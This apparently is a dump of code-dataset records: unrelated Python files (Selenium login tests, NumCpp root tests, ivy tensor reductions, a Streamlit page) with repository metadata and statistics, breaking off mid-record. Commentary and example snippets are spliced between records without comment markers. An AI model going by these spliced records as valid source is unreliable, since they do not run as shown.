GavinNishizawa/ncaa-march-madness-2018
|
8324e48ba32c685d60a4eb97e0f10f664a88710b
|
[
"MIT"
] | null | null | null |
src/models/log_reg.py
|
GavinNishizawa/ncaa-march-madness-2018
|
8324e48ba32c685d60a4eb97e0f10f664a88710b
|
[
"MIT"
] | null | null | null |
from sklearn import linear_model
def create():
return linear_model.LogisticRegression()
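A quick hypothetical usage of the create() factory above on toy data; the arrays here are illustrative only, not part of the project.
import numpy as np
from sklearn import linear_model

def create():
    return linear_model.LogisticRegression()

X = np.array([[0.0], [1.0], [2.0], [3.0]])  # toy feature column
y = np.array([0, 0, 1, 1])                  # toy binary labels
model = create()
model.fit(X, y)
print(model.predict([[3.0]]))  # expected [1], well past the class boundary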
| 13.571429
| 44
| 0.778947
| 11
| 95
| 6.545455
| 0.818182
| 0.305556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 95
| 6
| 45
| 15.833333
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
fe29a25b7886d784cb30352340a9e5e6a74893f3
| 97
|
py
|
Python
|
Coursera_HSE_Py_Ass-7.2-Intersection-of-many.py
|
YuriRevin/Coursera_HSE_Py_Ass-7.2-Intersection-of-many
|
ea29df1cfd47f847249e017ad318ee0b92dcdc75
|
[
"MIT"
] | null | null | null |
Coursera_HSE_Py_Ass-7.2-Intersection-of-many.py
|
YuriRevin/Coursera_HSE_Py_Ass-7.2-Intersection-of-many
|
ea29df1cfd47f847249e017ad318ee0b92dcdc75
|
[
"MIT"
] | null | null | null |
Coursera_HSE_Py_Ass-7.2-Intersection-of-many.py
|
YuriRevin/Coursera_HSE_Py_Ass-7.2-Intersection-of-many
|
ea29df1cfd47f847249e017ad318ee0b92dcdc75
|
[
"MIT"
] | null | null | null |
print(*(sorted(set(map(int, input().split())) &
set(map(int, input().split())))))
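The one-liner above intersects exactly two input lines. A sketch of the same idea generalized to N lines; the count n read from the first line is an assumption, not part of the original exercise.
from functools import reduce

n = int(input())  # hypothetical: number of lines to intersect
sets = (set(map(int, input().split())) for _ in range(n))
print(*sorted(reduce(set.intersection, sets)))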
| 32.333333
| 48
| 0.505155
| 12
| 97
| 4.083333
| 0.583333
| 0.244898
| 0.367347
| 0.571429
| 0.77551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206186
| 97
| 2
| 49
| 48.5
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
fe415ee8ca5c93713fefdc18d73f9b3beb430290
| 12,062
|
py
|
Python
|
test_login.py
|
Sonny-skyez/Selenium_test_-_Polls_app
|
5e166edbe6dcd9c23e6e75f349e0a249be1dfa39
|
[
"MIT"
] | null | null | null |
test_login.py
|
Sonny-skyez/Selenium_test_-_Polls_app
|
5e166edbe6dcd9c23e6e75f349e0a249be1dfa39
|
[
"MIT"
] | 1
|
2021-06-01T23:51:28.000Z
|
2021-06-01T23:51:28.000Z
|
test_login.py
|
Sonny-skyez/Selenium_test_-_Polls_app
|
5e166edbe6dcd9c23e6e75f349e0a249be1dfa39
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest
'''Test Login - the second test suite, which tests all possible user
login paths: username and no password, password but no username,
wrong password, wrong username, etc.
This test suite contains 7 test cases.
Tested URL: https://polls-application.herokuapp.com/polls/'''
class Test_1_no_user_no_pass(unittest.TestCase):
'''Test case when there is no user and no password
in login attempt by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Password:'])[1]/following::input[3]").click()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_2_login_pass_no_user(unittest.TestCase):
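'''Test case when a password is typed in
but no username.'''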
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_password").click()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("XXXXXX")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Password:'])[1]/following::input[3]").click()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_3_login_user_no_pass(unittest.TestCase):
'''Test case with right username and no password
typed in by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Password:'])[1]/following::input[3]").click()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_4_wrong_user_pass(unittest.TestCase):
'''Test case with wrong username and right password
typed in by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("sonnny")
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("XXXXXX")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_5_user_wrong_pass(unittest.TestCase):
'''Test case for the situation when the username is right
and the password is wrong.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("wrongpass")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_6_wrong_user_wrong_pass(unittest.TestCase):
'''Test case with wrong username and wrong password
typed in by user.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("xxx")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
class Test_7_login_logout(unittest.TestCase):
'''Test case with proper username and password;
successful login attempt + logout.'''
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.verificationErrors = []
self.accept_next_alert = True
def test_app(self):
driver = self.driver
driver.get("https://polls-application.herokuapp.com/polls/")
driver.find_element_by_link_text("Admin").click()
driver.find_element_by_id("id_username").click()
driver.find_element_by_id("id_username").clear()
driver.find_element_by_id("id_username").send_keys("Sonny")
driver.find_element_by_id("login-form").submit()
driver.find_element_by_id("id_password").clear()
driver.find_element_by_id("id_password").send_keys("XXXXXX")
driver.find_element_by_id("login-form").submit()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
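The seven cases above repeat identical setUp/tearDown and login boilerplate. A sketch of one way to factor out the duplication; the base-class and helper names are hypothetical, while the Selenium 3 style locator calls match the suite above.
import unittest
from selenium import webdriver


class PollsLoginTestBase(unittest.TestCase):
    URL = "https://polls-application.herokuapp.com/polls/"

    def setUp(self):
        self.driver = webdriver.Chrome()
        self.driver.implicitly_wait(30)
        self.verificationErrors = []

    def login(self, username=None, password=None):
        # Open the polls app, go to the admin login, fill whichever
        # fields were supplied, and submit the form.
        driver = self.driver
        driver.get(self.URL)
        driver.find_element_by_link_text("Admin").click()
        if username is not None:
            driver.find_element_by_id("id_username").clear()
            driver.find_element_by_id("id_username").send_keys(username)
        if password is not None:
            driver.find_element_by_id("id_password").clear()
            driver.find_element_by_id("id_password").send_keys(password)
        driver.find_element_by_id("login-form").submit()

    def tearDown(self):
        self.assertEqual([], self.verificationErrors)
        self.driver.quit()


class TestUserNoPass(PollsLoginTestBase):
    def test_app(self):
        self.login(username="Sonny")  # right user, no password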
| 30.614213
| 112
| 0.628337
| 1,442
| 12,062
| 4.994452
| 0.083218
| 0.069425
| 0.118023
| 0.131908
| 0.926687
| 0.913357
| 0.907526
| 0.891697
| 0.889892
| 0.878089
| 0
| 0.003186
| 0.271431
| 12,062
| 394
| 113
| 30.614213
| 0.81634
| 0.035483
| 0
| 0.941379
| 0
| 0.010345
| 0.092098
| 0.022273
| 0
| 0
| 0
| 0
| 0.024138
| 1
| 0.144828
| false
| 0.068966
| 0.013793
| 0
| 0.303448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
fe6670ca62545f6d92cb3493d1afaf20ed69ae0f
| 107
|
py
|
Python
|
yandex_kassa/utils.py
|
VladimirFilonov/django-yandex-kassa
|
1855ff6766648647d9f251856a54f9c8b572cb4d
|
[
"MIT"
] | null | null | null |
yandex_kassa/utils.py
|
VladimirFilonov/django-yandex-kassa
|
1855ff6766648647d9f251856a54f9c8b572cb4d
|
[
"MIT"
] | null | null | null |
yandex_kassa/utils.py
|
VladimirFilonov/django-yandex-kassa
|
1855ff6766648647d9f251856a54f9c8b572cb4d
|
[
"MIT"
] | 1
|
2019-06-10T11:58:49.000Z
|
2019-06-10T11:58:49.000Z
|
# -*- coding: utf-8 -*-
from uuid import uuid4
def get_uuid():
return str(uuid4()).replace('-', '')
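A quick sanity check of get_uuid() above: stripping the dashes from a UUID4 string equals the UUID's .hex attribute, 32 lowercase hex characters.
from uuid import uuid4

u = uuid4()
assert str(u).replace('-', '') == u.hex
print(u.hex)  # 32 hex chars, no dashes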
| 13.375
| 40
| 0.570093
| 14
| 107
| 4.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034884
| 0.196262
| 107
| 7
| 41
| 15.285714
| 0.662791
| 0.196262
| 0
| 0
| 0
| 0
| 0.011905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
fe696877f9b8146c3805d1678091e0ad1abf6fa4
| 86
|
py
|
Python
|
buy_lambo/__init__.py
|
iamnapo/buy-lambo
|
f823f1b3135fc9a631751451ecc5e5ccc3b526aa
|
[
"MIT"
] | 9
|
2019-04-22T06:20:14.000Z
|
2021-02-11T10:08:27.000Z
|
buy_lambo/__init__.py
|
iamnapo/buy-lambo
|
f823f1b3135fc9a631751451ecc5e5ccc3b526aa
|
[
"MIT"
] | null | null | null |
buy_lambo/__init__.py
|
iamnapo/buy-lambo
|
f823f1b3135fc9a631751451ecc5e5ccc3b526aa
|
[
"MIT"
] | 2
|
2020-05-23T05:59:35.000Z
|
2020-12-02T11:13:49.000Z
|
from .buy_lambo import buy_lambo
from .create_HODL_address import create_HODL_address
| 28.666667
| 52
| 0.883721
| 14
| 86
| 5
| 0.5
| 0.228571
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 86
| 2
| 53
| 43
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
feb19538c76a8836df9a3efe74dc6b5496e1b15d
| 3,116
|
py
|
Python
|
unitTests/testScripts/TestRoots.py
|
liute62/NumCpp
|
d6922b2b5e1f575021b0577aea1445e041ec7180
|
[
"MIT"
] | null | null | null |
unitTests/testScripts/TestRoots.py
|
liute62/NumCpp
|
d6922b2b5e1f575021b0577aea1445e041ec7180
|
[
"MIT"
] | null | null | null |
unitTests/testScripts/TestRoots.py
|
liute62/NumCpp
|
d6922b2b5e1f575021b0577aea1445e041ec7180
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.special as sp
from termcolor import colored
import sys
if sys.platform == 'linux':
sys.path.append(r'../lib')
else:
sys.path.append(r'../build/x64/Release')
import NumCpp
####################################################################################
def doTest():
print(colored('Testing Roots Module', 'magenta'))
print(colored('Testing bisection', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.bisection_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing brent', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.brent_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing dekker', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.dekker_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing newton', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.newton_roots(polyC, largestRoot)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
print(colored('Testing secant', 'cyan'))
root = np.random.randint(-50, 50, [1,]).item()
roots = np.array([root, root + np.random.randint(5, 50, [1,]).item()])
largestRoot = roots.max().item()
rootsC = NumCpp.NdArray(1, roots.size)
rootsC.setArray(roots)
polyC = NumCpp.Poly1d(rootsC, True)
rootC = int(np.round(NumCpp.secant_roots(polyC, largestRoot - 1, largestRoot + 1)))
if rootC == largestRoot:
print(colored('\tPASS', 'green'))
else:
print(colored('\tFAIL', 'red'))
####################################################################################
if __name__ == '__main__':
doTest()
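The five blocks in doTest() above differ only in the solver called and its bracket arguments. A sketch of the same flow with the duplication factored out; the helper name is hypothetical, it assumes the same sys.path setup as the script above, and only the NumCpp calls already used there.
import numpy as np
from termcolor import colored
import NumCpp  # assumes the same sys.path setup as the script above

def check_solver(label, solve):
    # Build a random polynomial from two known roots, then check that
    # the given solver recovers the larger root.
    print(colored('Testing ' + label, 'cyan'))
    root = np.random.randint(-50, 50, [1, ]).item()
    roots = np.array([root, root + np.random.randint(5, 50, [1, ]).item()])
    largest = roots.max().item()
    rootsC = NumCpp.NdArray(1, roots.size)
    rootsC.setArray(roots)
    polyC = NumCpp.Poly1d(rootsC, True)
    found = int(np.round(solve(polyC, largest)))
    ok = found == largest
    print(colored('\tPASS' if ok else '\tFAIL', 'green' if ok else 'red'))

# Bracketed methods take (largest - 1, largest + 1); Newton needs only a guess.
check_solver('bisection', lambda p, r: NumCpp.bisection_roots(p, r - 1, r + 1))
check_solver('newton', lambda p, r: NumCpp.newton_roots(p, r))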
| 36.658824
| 90
| 0.588254
| 378
| 3,116
| 4.814815
| 0.164021
| 0.105495
| 0.065934
| 0.104396
| 0.825275
| 0.825275
| 0.825275
| 0.825275
| 0.825275
| 0.825275
| 0
| 0.02549
| 0.181643
| 3,116
| 84
| 91
| 37.095238
| 0.688235
| 0
| 0
| 0.69863
| 0
| 0
| 0.087517
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0.068493
| 0.068493
| 0
| 0.082192
| 0.219178
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22916b872f43cbac0dbeafcca8a941ef116be126
| 1,372
|
py
|
Python
|
ivy/functional/backends/torch/utility.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy/functional/backends/torch/utility.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/torch/utility.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
# global
import ivy
import torch
from typing import Union, Optional, Tuple, List
# noinspection PyShadowingBuiltins
def all(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int], List[int]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
x = x.type(torch.bool)
if axis is None:
num_dims = len(x.shape)
axis = list(range(num_dims))
if isinstance(axis, int):
return torch.all(x, dim=axis, keepdim=keepdims, out=out)
dims = len(x.shape)
axis = [i % dims for i in axis]
axis.sort()
for i, a in enumerate(axis):
x = torch.all(x, dim=a if keepdims else a - i, keepdim=keepdims, out=out)
return x
# noinspection PyShadowingBuiltins
def any(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int], List[int]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
x = ivy.asarray(x).type(torch.bool)
if axis is None:
num_dims = len(x.shape)
axis = list(range(num_dims))
if isinstance(axis, int):
return torch.any(x, dim=axis, keepdim=keepdims, out=out)
dims = len(x.shape)
axis = [i % dims for i in axis]
axis.sort()
for i, a in enumerate(axis):
x = torch.any(x, dim=a if keepdims else a - i, keepdim=keepdims, out=out)
return x
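A quick check of what the tuple-axis branch above computes: reducing over axes (0, 1) one dimension at a time, with the index shift the loop applies, matches a full reduction.
import torch

x = torch.tensor([[True, False], [True, True]])
step = torch.all(x, dim=0)       # reduce axis 0 first -> tensor([ True, False])
result = torch.all(step, dim=0)  # original axis 1, shifted to 0 after the first pass
assert result == torch.all(x)    # both tensor(False)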
| 28
| 81
| 0.618076
| 204
| 1,372
| 4.137255
| 0.215686
| 0.078199
| 0.037915
| 0.061611
| 0.810427
| 0.810427
| 0.810427
| 0.810427
| 0.810427
| 0.810427
| 0
| 0
| 0.248542
| 1,372
| 48
| 82
| 28.583333
| 0.818623
| 0.052478
| 0
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.073171
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22ac21c25c5178c32cf1d9c48e38932ce7c9c8f9
| 2,775
|
py
|
Python
|
otros.py
|
matiaslhlab/pydaychile2020_streamlit
|
223fac440ad5fa8897574b75ef19ca898cee6520
|
[
"Apache-2.0"
] | 2
|
2021-01-15T20:24:09.000Z
|
2021-03-08T17:06:14.000Z
|
otros.py
|
matiaslhlab/pydaychile2020_streamlit
|
223fac440ad5fa8897574b75ef19ca898cee6520
|
[
"Apache-2.0"
] | null | null | null |
otros.py
|
matiaslhlab/pydaychile2020_streamlit
|
223fac440ad5fa8897574b75ef19ca898cee6520
|
[
"Apache-2.0"
] | 1
|
2020-12-09T22:50:47.000Z
|
2020-12-09T22:50:47.000Z
|
import streamlit as st
import dtale
from dtale.views import startup
import numpy as np
import pandas as pd
def write():
with st.spinner("Cargando Otros Elementos ..."):
st.title("Otros elementos de Streamlit")
st.header("Reportes en PowerBI")
url1="https://app.powerbi.com/view?r=eyJrIjoiMDA4NGFhNmEtZDE4Mi00MWNhLTg5OTMtMWE2MzYxNTVmMTFlIiwidCI6ImI3M2IxZDZlLTIxZDUtNGUzOC1iMjM5LTgxMzRkOWQyYmY3OCIsImMiOjh9"
st.subheader("Podemos integrar un reporte realizado en PowerBI (de 800x540)")
st.markdown('''
<iframe width="840" height="540" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>
''' % url1, unsafe_allow_html=True)
st.write("código:")
st.code("""url1="https://app.powerbi.com/view?r=eyJrIjoiMDA4NGFhNmEtZDE4Mi00MWNhLTg5OTMtMWE2MzYxNTVmMTFlIiwidCI6ImI3M2IxZDZlLTIxZDUtNGUzOC1iMjM5LTgxMzRkOWQyYmY3OCIsImMiOjh9"
st.subheader("Podemos tener un reporte de 800x540")
st.markdown('''
<iframe width="840" height="540" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>''' % url1, unsafe_allow_html=True)""")
url2="https://app.powerbi.com/view?r=eyJrIjoiMjEwYjgzNWUtZGQ4Ni00ODMwLWI0NjgtNzk3NjkxODIwNDM4IiwidCI6IjFmZjk0MGQ4LWFkOGEtNDNkZi1iZjQxLWI2OThkMWJkODVmNiIsImMiOjh9"
st.subheader("O también algo tener el reporte un poco más pequeño (de 560x360)")
st.markdown("""
<iframe width="560" height="360" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>
""" % url2, unsafe_allow_html=True)
st.write("código:")
st.code('''url2="https://app.powerbi.com/view?r=eyJrIjoiMjEwYjgzNWUtZGQ4Ni00ODMwLWI0NjgtNzk3NjkxODIwNDM4IiwidCI6IjFmZjk0MGQ4LWFkOGEtNDNkZi1iZjQxLWI2OThkMWJkODVmNiIsImMiOjh9"
st.subheader("O también algo más pequeño de 560x360")
st.markdown("""
<iframe width="560" height="360" src="%s" frameborder="0" style="border:0" allowfullscreen="true"></iframe>""" % url2, unsafe_allow_html=True)''')
st.header("Dataframes Interactivos en D-TALE")
st.markdown("""D-Tale es una herramienta Open Source que permite ver, analizar y modificar de una manera fácil estructuras de datos en Pandas. Para más información ver su [github](https://github.com/man-group/dtale)""")
df=pd.read_csv(r'dataset/indian_liver.csv')
startup(data_id="1", data=df)
st.markdown("""<iframe width="840" height="540" src="/dtale/main/1" />""",unsafe_allow_html=True)
st.write("código:")
st.code('''st.markdown("""D-Tale es una herramienta Open Source que permite ver, analizar y modificar de una manera fácil estructuras de datos en Pandas. Para más información ver su [github](https://github.com/man-group/dtale)""")
df=pd.read_csv(r'dataset/indian_liver.csv')
startup(data_id="1", data=df)
st.markdown("""<iframe width="840" height="540" src="/dtale/main/1" />""",unsafe_allow_html=True)''')
| 64.534884
| 231
| 0.765045
| 354
| 2,775
| 5.946328
| 0.299435
| 0.038005
| 0.045606
| 0.059857
| 0.861283
| 0.861283
| 0.861283
| 0.861283
| 0.861283
| 0.835154
| 0
| 0.051161
| 0.084324
| 2,775
| 43
| 232
| 64.534884
| 0.777253
| 0
| 0
| 0.282051
| 0
| 0.179487
| 0.79755
| 0.122478
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.128205
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22b1c9f6bd389e04d4cb87e2552b5d0ed3cbd3cb
| 123
|
py
|
Python
|
Chapter11_DeepQNetworksAtari/2_DQN/pongDqnWrappers.py
|
franneck94/UdemyAI
|
bb3decc35ec626a09edf0abdbfbe7c36dac6179a
|
[
"MIT"
] | 2
|
2021-02-10T19:50:27.000Z
|
2021-12-30T06:15:55.000Z
|
Chapter11_DeepQNetworksAtari/2_DQN/pongDqnWrappers.py
|
